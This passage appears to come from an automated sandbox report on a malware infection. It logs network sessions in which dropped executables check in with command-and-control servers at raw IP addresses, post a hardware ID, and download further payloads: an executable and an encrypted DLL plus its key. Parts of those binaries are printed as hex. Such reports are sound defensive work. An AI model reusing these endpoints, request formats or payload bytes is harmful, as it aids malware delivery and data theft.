                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.037197113 CET248INData Raw: bf 4d ca 28 70 45 cf bc fa 01 70 9c 49 c6 f8 78 ba 2f fb 28 27 74 39 3d f8 19 96 d8 b6 71 0e b0 7c ac a2 39 99 9b e1 31 94 17 80 ac 4b d4 f1 c6 f0 32 e2 d3 78 a2 c1 e7 bf 1e ad c3 ae a4 4d 7b 96 89 05 78 18 b7 08 6e fc 50 e5 c5 27 d9 37 c5 76 84
                                                                                                                                                                                                                                            Data Ascii: M(pEpIx/('t9=q|91K2xM{xnP'7veD.lLQ-w%'O2w81.O{|-a2V41`dA=7i2V9tOCoYo=iMt v
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.038042068 CET1236INData Raw: 77 71 b6 7f e6 c3 25 da b8 1e d0 c3 9b 29 ce 4a 3a 91 f8 1f 94 33 7b 66 9f 19 cf 1b 53 af 73 37 57 ab a4 63 0c f6 ad e2 7b 40 c2 52 b8 78 a6 fa 4f 78 8f c9 73 c5 7d af 45 9e 2e 94 16 2c fd d4 3b 28 f8 98 cd 7a c3 97 79 ff 09 cb d0 b9 0e f8 61 b1
                                                                                                                                                                                                                                            Data Ascii: wq%)J:3{fSs7Wc{@RxOxs}E.,;(zyaTB(w^uFX+K)Y!Y(x1c=<YQ(UYO?Bh-I`n+x3cwkD<z
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.038261890 CET1236INData Raw: b8 6a f6 a9 1c 05 02 d6 5b 16 cf c1 a8 38 cf 3f 74 ab 91 54 b0 bf ef e3 67 ac 89 8c b0 dd 1e 44 78 14 35 8a bd 4d 08 e1 b9 af dd 57 ea 15 91 aa 87 2d e9 74 e8 80 b2 37 f8 c7 79 05 24 ab e9 9e ea f9 45 aa 2b c5 f9 50 79 6e 06 a8 fe 55 6e d6 47 ad
                                                                                                                                                                                                                                            Data Ascii: j[8?tTgDx5MW-t7y$E+PynUnGv$Z3k s"bsCw](/+{s9y"=-Xv%]#+Dh;5,g/!$mPp8#A }
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.155591011 CET1236INData Raw: 1e 5f 0c 90 7c dd d1 57 1e 95 8b ac 16 b0 fe b1 0e ae 0e d6 5b 2e 1f 9a ee f6 ff 8f be c7 59 d9 7b ad 79 52 5a 72 de 77 e9 76 01 d9 1f 2f 24 f0 90 92 1d b4 ed 95 20 9a 77 99 8a aa 04 f3 3d c4 e9 e5 ee 23 74 c3 c4 d9 c7 df cf b3 c0 c7 33 45 a7 d6
                                                                                                                                                                                                                                            Data Ascii: _|W[.Y{yRZrwv/$ w=#t3E7a|h)3pOuP$-)\+=IO;9tkzk |9T-Co]ATC9dx.EyHK/)W


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            9192.168.2.649942185.215.113.43805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:39.609054089 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 33 35 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                            Data Ascii: d1=1013512001&unit=246122658369
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:40.974790096 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:40 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            10192.168.2.649944185.215.113.206805936C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:40.558505058 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:41.900995970 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:41 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.137903929 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                            Content-Length: 211
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 32 42 44 33 34 30 35 45 36 46 31 33 35 30 38 32 37 30 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="hwid"DC2BD3405E6F1350827015------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="build"stok------KEGCBFCBFBKFHIECAFCF--
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.584184885 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:42 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                            Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            11192.168.2.649945185.215.113.16805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:41.098817110 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.434988976 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:41 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 973312
                                                                                                                                                                                                                                            Last-Modified: Mon, 09 Dec 2024 20:03:57 GMT
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            ETag: "67574d2d-eda00"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 25 4d 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 2a 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                                                                            Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL%MWg"*w@0@@@d|@ou4@.text `.rdata@@.datalpH@.rsrco@p@@.relocuvd@B
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.435098886 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
                                                                                                                                                                                                                                            Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQ
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.435467958 CET1236INData Raw: e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8 e3 23 00 00 68 17 24 44 00 e8 2f f0 01 00 59 c3 e8 de 25 00 00 68 1c 24 44 00 e8 1e f0 01 00 59 c3 e8 ae e7 01 00 68 21 24 44 00 e8 0d f0 01 00 59
                                                                                                                                                                                                                                            Data Ascii: h$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.435529947 CET1236INData Raw: 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00
                                                                                                                                                                                                                                            Data Ascii: OO_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.435540915 CET248INData Raw: 00 8b ce e8 ab b5 00 00 6a 40 56 e8 d0 e3 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 53 8b d9 56 57 80 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00
                                                                                                                                                                                                                                            Data Ascii: j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.436186075 CET1236INData Raw: 8b 75 08 57 8b f9 56 83 67 08 00 e8 eb e5 00 00 8a 46 10 8d 4f 20 88 47 10 8b 46 14 89 47 14 8a 46 18 88 47 18 8d 46 20 83 61 08 00 50 e8 c9 e5 00 00 8a 46 30 88 47 30 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 89 11 40 89 41 0c 89 51 08 88 51 10 89 51
                                                                                                                                                                                                                                            Data Ascii: uWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q Q(Q0V&NW LjE$|I IF^jAZ @uSV5I3WjXSG
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.436197996 CET1236INData Raw: 00 8b 41 0c 83 e8 01 74 29 83 e8 01 0f 84 d4 07 04 00 83 e8 01 0f 84 bb 07 04 00 83 e8 01 74 19 83 e8 03 74 0d 48 83 e8 01 0f 85 97 07 04 00 8a 01 c3 83 39 00 0f 95 c0 c3 8b 41 08 83 78 04 00 eb f3 55 8b ec 53 56 8b 75 08 33 db 57 8a d3 8b 0e 8d
                                                                                                                                                                                                                                            Data Ascii: At)ttH9AxUSVu3WyQ>t(M@f9Xu8!tt_^3[]U3BSVWPPUUJ(MO1f~u6 t+u+3+fy4
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.436203957 CET248INData Raw: 7f 05 04 00 3b fb 0f 84 26 fe ff ff e9 72 05 04 00 83 38 05 0f 85 d0 fe ff ff ff 45 f4 8d 45 ec 89 7d ec 8d 8d 54 ff ff ff 50 47 e8 5a 03 00 00 8b 45 d8 8b 48 04 8b 85 58 ff ff ff 89 45 bc e9 a6 fe ff ff 83 e8 21 0f 85 23 01 00 00 8b 41 04 6a 7f
                                                                                                                                                                                                                                            Data Ascii: ;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuWAjYf9HEHOTE]ETpXEE
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.436477900 CET1236INData Raw: 00 3b fb 0f 84 31 fd ff ff e9 85 04 04 00 ff 75 e8 ff 75 f4 ff 75 e4 ff 75 e0 53 52 ff 75 f0 33 db 53 e8 86 03 00 00 85 c0 78 02 8b f3 8d 4d 84 e8 1a 02 00 00 8d 8d 78 ff ff ff e8 0f 02 00 00 8d 8d 6c ff ff ff e8 04 02 00 00 8d 8d 60 ff ff ff e8
                                                                                                                                                                                                                                            Data Ascii: ;1uuuuSRu3SxMxl`MTM_^[rU]AjYf9H}AjYf9HEE}xPG|EIE
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.436599016 CET1236INData Raw: 00 88 5c 24 19 88 5c 24 1a ff 15 28 c3 49 00 8d 44 24 13 50 ff 75 08 e8 c2 03 00 00 ff 15 18 c2 49 00 85 c0 0f 85 aa 00 04 00 a1 00 14 4d 00 85 c0 0f 84 b5 00 04 00 33 ff be 90 23 4d 00 47 3b c7 0f 84 b1 00 04 00 8d 44 24 11 50 51 68 00 14 4d 00
                                                                                                                                                                                                                                            Data Ascii: \$\$(ID$PuIM3#MG;D$PQhMhM,#MM#MD$D$P$<Ph5MhIt$MY@\$5MhMa|$sY4=MMuW0M
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:42.554760933 CET1236INData Raw: 4d e0 e8 6c a0 00 00 8b 75 ac 8d 4d f0 e8 22 7a 00 00 8d 45 f0 50 8d 4d 90 e8 39 01 00 00 8b 7d f0 57 68 58 ca 49 00 e8 cf 1a 02 00 59 59 85 c0 0f 84 8b fd 03 00 57 68 30 ca 49 00 e8 ba 1a 02 00 59 59 85 c0 0f 84 92 fd 03 00 57 68 08 ca 49 00 e8
                                                                                                                                                                                                                                            Data Ascii: MluM"zEPM9}WhXIYYWh0IYYWhIYYWhIYYu>M8]uMEPMEMPxEPM9MM3NQjWJ:u3]@ESPEPW@


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            12192.168.2.64995780.82.65.70803132C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.726979017 CET412OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: 1
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.904295921 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:45 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.916407108 CET386OUTGET /dll/key HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: 1
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.392565012 CET224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:46 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 21
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                                                                                                                                                                                            Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.398927927 CET391OUTGET /dll/download HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: 1
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959505081 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:46 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                                                                                                                                                                                                            Content-Length: 97296
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                                                                                                                                                                                                                            Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959547043 CET224INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                                                                                                                                                                                                                            Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(ucc
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959557056 CET1236INData Raw: f9 ad 67 76 17 ac ab 0b db 40 d6 4d bb cd 29 6e a5 f1 4c c0 34 97 4f a7 0e ef fc 69 77 78 64 69 c1 97 d8 e5 76 6d 29 51 42 65 a8 c4 f5 a2 34 c7 ba 35 61 41 aa 57 a4 b7 cf 8b 03 c3 a3 26 de 8a 41 ec 05 e5 7f c7 58 21 a7 f2 0c 7b c0 5b 44 1a 6d 43
                                                                                                                                                                                                                                            Data Ascii: gv@M)nL4Oiwxdivm)QBe45aAW&AX!{[DmC(^_iPUrl9L"?2Z,+V:R&!HJqa&uv5"+o%P4@.vgAY#i?_$J8sQ^I#sn`G}HC
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959661961 CET1236INData Raw: b8 96 c1 6b 69 27 5c ee c7 f9 89 a8 9e 4c 34 d5 75 9d fe 61 ca 18 4d 6f 0d 99 bc 16 23 4a 4b fb 31 9f 78 59 bb 31 c6 42 c1 b8 db d8 d2 09 84 0e 37 cd 9f 81 56 19 9f 47 ef 83 60 3c 07 f7 1b 6f 60 ce ba f3 16 fe 3c 27 3e b4 51 bc dc c3 26 bf 0f df
                                                                                                                                                                                                                                            Data Ascii: ki'\L4uaMo#JK1xY1B7VG`<o`<'>Q&Md42R32zD4:6vaG3~}safF4d|a.V6.qz$C'^Y'=C]YA'6mo@{# }YniEVoD"8*k;
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959680080 CET448INData Raw: 9b 84 b6 11 05 74 f4 6a 29 ea 95 12 3e 4e c6 5d 07 8a 8c 6e 0a 29 df c0 d0 dc 61 4a f2 87 c7 57 b7 17 8a ec 0d 94 4d 28 cc 70 af e6 39 a5 16 63 ea 3d 97 af a2 e0 b5 f0 4d db 26 a7 ce 90 e4 a4 5d c2 5d 0e 75 5a 74 b9 53 4e 57 3f b4 a7 76 c9 b2 72
                                                                                                                                                                                                                                            Data Ascii: tj)>N]n)aJWM(p9c=M&]]uZtSNW?vr>o+X<T<RvNdl:b=l{bK)06(]LiR(:'hbJ5}V78t4L7xqmFJ-rBCk1^u^Xe@bZ@%
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959691048 CET1236INData Raw: 5a 4e 90 47 87 8d 31 4d 04 f3 b2 8f b5 ec 0b 34 86 f5 8a 59 cc e1 31 db ef 09 6f 5f de 50 ce 55 7c bf 37 d2 26 b8 77 5e 1f 27 ab 58 1f ee ce 9b bf 8d 85 b2 80 b7 5a 06 25 9d b3 27 1c c8 e3 6c 36 e5 a3 7d 22 17 b3 13 00 d6 07 77 28 09 24 fc 89 30
                                                                                                                                                                                                                                            Data Ascii: ZNG1M4Y1o_PU|7&w^'XZ%'l6}"w($0_g8^T1bf4n\vl)OCoKaC#/|fZyhc7LY=T(b8be@yo~YN_ozIe_*%BH1uObUR|aXyt
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959702015 CET1236INData Raw: c0 da 67 42 4f 24 35 da 00 c2 9f 29 69 11 0c 49 94 a6 a7 92 c3 e7 14 45 de 79 b3 d8 e2 24 85 e6 7e c2 2a ec 32 fa 5b b8 db e4 ea 7c 97 4e cb e1 cc b0 1d f4 fb a3 05 75 fa 46 d0 b4 ab dc eb 81 ad f1 f2 0d 38 68 4a c0 b6 50 cd d7 bc 1f fb 5d 2b cf
                                                                                                                                                                                                                                            Data Ascii: gBO$5)iIEy$~*2[|NuF8hJP]+P|;3a__JnSgph=jkKOT3e13USC'{XJdey_ p[P<M%5:,rFTgYIR)"<N3ei-IQvtB
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.959990978 CET1236INData Raw: ed f5 bb 67 1c b0 2e 96 1b 41 e2 4b e0 d0 c0 32 d7 54 d0 57 51 be 23 33 85 40 1d 3e 06 84 94 eb 5a 77 62 51 fd 8a 8b fe 9b 5e 14 3c 3b b6 5d 0d 8f 18 29 53 7a e3 4a 54 9e 1e 8f c8 d7 2e 61 9b 87 bb e4 ef bd c8 ac 33 94 fa df 50 e0 e1 f7 4e ef 39
                                                                                                                                                                                                                                            Data Ascii: g.AK2TWQ#3@>ZwbQ^<;])SzJT.a3PN9Yn(X"h!rrn~O+;}?jjo-?1RXUC|B\n2/}=.H,/Ta@IEh8|[cbNVNzcY".n$GA
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.960001945 CET1236INData Raw: 1a 2a 62 b4 ae 8a 5b 82 f2 2e 8d 4c f7 bc 4a 54 d2 2f 9c 5e d2 78 32 e3 23 07 42 8b dd c1 ad 98 37 2e 4a db d1 95 b9 bb 1a f0 cf e7 16 4b fc ec 93 ab e6 08 7e 4b 49 dc 0d 53 c5 8e 5f f2 c2 11 55 dc 53 1e 24 d4 8f 7e fa 25 60 68 8f b2 67 bd 27 d8
                                                                                                                                                                                                                                            Data Ascii: *b[.LJT/^x2#B7.JK~KIS_US$~%`hg'?CW[MQHSB-v0< c\tMc[T4Auxxc*+hMgC]`=o8M}k+B[5Nx62G(%OrKv5H0Uq`42p0;U&
